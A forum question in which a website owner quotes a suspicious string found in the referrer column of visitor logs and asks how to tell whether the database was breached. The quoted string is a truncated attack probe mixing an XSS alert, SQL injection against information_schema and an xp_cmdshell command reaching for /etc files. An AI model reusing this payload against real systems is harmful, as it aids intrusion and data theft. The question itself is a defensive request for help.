# How can I check if this code has done harm?

Tags: database

While monitoring visitors to my website, I noticed this code in referrer column:-

```
alert(\"XSS\")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc%'>https://example.com/?display=1') AND 1=1 UNION A.......
```

I am new to this as it has never happened before. But it is obvious that it is to do with the database.  The strange thing is that the IP address belongs to Microsoft: 20.94.192.0

Please how can I determine if I have been hacked, or the database been compromised, somehow?  Would greatly appreciate your help.

Comment: any chance of a response tp point me in the right direction, please?

Comment: Is something wrong with my question  that led to no response?